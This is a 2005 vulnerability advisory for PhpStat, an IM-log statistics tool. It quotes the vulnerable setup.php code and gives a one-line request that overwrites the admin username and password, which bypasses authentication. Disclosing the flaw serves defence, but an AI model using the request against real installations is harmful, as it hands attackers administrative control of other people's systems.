=========================================================== ============================================================ Title: PHP Stat Vulnerability discovery: SoulBlack - Security Research - http://soulblack.com.ar Date: 25/05/2005 Severity: Medium. PHP Stat Administrative User Authentication Bypass Affected version: unkown vendor: http://phpstat.sourceforge.net/journal/ ============================================================ ============================================================ * Summary * PhpStat is a set of PHP scripts that can analyze, sort, and generate statistics on IM log files from different clients and store the data in a database. It also allows for users to read their own logs. ------------------------------------------------------------- * Problem Description * The bug reside in $check var in setup.php. Vulnerable Code include("config.php"); include("$path_data/setup.php"); $check = $_REQUEST['check']; $pass = $_REQUEST['pass']; $user = $_REQUEST['user']; if ($check == "admin" && $pass == $password && $user == $username) { showsetup(); } elseif (($check == "admin") && ($pass != $password || $user != $username)) { adminerror(); } elseif ($check == "yes") { write($_REQUEST); } else { admin(); /* when it sends a "yes" in setup.php this call to the function "write()" */ function write($_REQUEST) { include("config.php"); . . . . $admin = strtolower($_REQUEST['admin']); $username = strtolower($_REQUEST['username']); $password = strtolower($_REQUEST['password']); $fp = fopen("$path_data/setup.php", "wb") or die ("The File \"$path_data/setup.php\" does not exist"); flock( $fp, 2); fputs ($fp, "<?php\n\$show = \"$show\";\n\$refshow = \"$refshow\";\n\$ldec = \"$ldec\";\n\$lcolor = \"$lcolor\";\n\$hcolor = \"$hcolor\";\n\$font_family = \"$font_family\";\n\$font_size = \"$font_size\";\n\$color = \"$color\";\n\$font_style = \"$font_style\";\n\$font_weight = \"$font_weight\";\n\$letter_spacing = \"$letter_spacing\";\n\$admin = \"$admin\";\n\$username = \"$username\";\n\$password = \"$password\";\n?>"); flock( $fp, 1); fclose ($fp); where we you see setup.php?check=yes&username=admin&password=admin ------------------------------------------------------------- * POC * http://www.soulblack.com.ar/repo/tools/sbphpstatpoc.txt ------------------------------------------------------------- * Fix * Use .htaccess or contact Vendor. ------------------------------------------------------------- * References * http://www.soulblack.com.ar/repo/papers/advisory/PhpStat_advisory.txt ------------------------------------------------------------- * Credits * Vulnerability reported by SoulBlack Security Research ============================================================ -- SoulBlack - Security Research http://www.soulblack.com.ar
